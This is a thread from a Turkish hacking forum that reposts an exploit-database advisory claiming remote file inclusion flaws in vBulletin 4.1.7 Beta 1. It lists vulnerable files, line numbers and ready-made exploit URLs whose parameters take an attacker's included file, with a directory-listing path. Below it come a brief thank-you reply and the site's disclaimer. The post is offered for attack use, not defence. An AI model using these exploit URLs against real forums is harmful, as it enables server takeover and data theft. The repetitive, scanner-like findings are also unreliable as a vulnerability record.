vBulletin 4.1.7 Beta 1 Remote File Inclusion

!nFiNiTe

Kadim Üye
21 Şub 2011
5,915
3
Hell
PHP:
====================================================
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability 
====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0    .    .--.   .--.   .---.      .                  1
1  .'|        )      )      /      |                  0
0    |     --:    --:      /    .-.| .-.  .  .        1
1    |        )      )    /    (   |(   ) |  |        0
0  '---'  `--'   `--'    '      `-'`-`-'`-`--|        1
1                                            ;        0
0     Site            : 1337day.com        `-'        1
1     Support e-mail  : submit[at]inj3ct0r.com        0
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

           # Vendor: noLogging by SCRiPTZSECTOR.ORG 

                 # Date: 2011-07-27 

                # Author : indoushka 

            +++=[ Dz Offenders Cr3w ]=+++

         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 

           # Contact : [email protected]

     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

########################################################################  
                                                                                                                                                                                                
# Exploit By indoushka 
-------------

Powered by vBulletin® Version 4.1.7 Beta 1

RFI :
Function: include    File: api.php            Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

##################################################

Function: include    File: api.php            Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

##################################################

Function: require_once    File: payment_gateway.php            Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

##################################################

Function: require_once    File: payment_gateway.php            Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

##################################################

Function: include_once    File: cronadmin.php            Line: 4
Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]

##################################################

Function: include    File: diagnostic.php            Line: 12
Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]

##################################################

Function: require_once    File: diagnostic.php            Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

##################################################

Function: require_once    File: diagnostic.php            Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

##################################################

Function: include_once    File: plugin.php            Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

##################################################

Function: include_once    File: plugin.php            Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

##################################################

Function: include_once    File: class_block.php            Line: 14
Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]

##################################################

Function: require_once    File: class_humanverify.php            Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]

##################################################

Function: require_once    File: class_humanverify.php            Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]

##################################################

Function: require_once    File: class_paid_subscription.php            Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]

##################################################

Function: require_once    File: class_paid_subscription.php            Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]

##################################################

Function: require_once    File: functions.php            Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

##################################################

Function: require_once    File: functions.php            Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

##################################################

Function: include_once    File: functions_cron.php            Line: 8
Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]

##################################################

Function: require    File: vb.php            Line: 7
Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]

##################################################

Function: require_once    File: class_upgrade.php            Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]

##################################################

Function: require_once    File: class_upgrade.php            Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]

##################################################

Function: include_once    File: attach.php            Line: 80
Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]

##################################################

Function: include_once    File: attach.php            Line: 604
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Function: include_once    File: attach.php            Line: 1222
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Directory Listing ckeditor :

http://localhost/vB1/clientscript/ckeditor/

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------
 

Tsutomu

Üye
14 Eki 2011
56
0
anlamadıkları için herkes adına konuşmayımda hacki msn ve face hack olarak algıladıkları için şu güzelim paylaşımın değerini anlayamamışlar. tşk.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.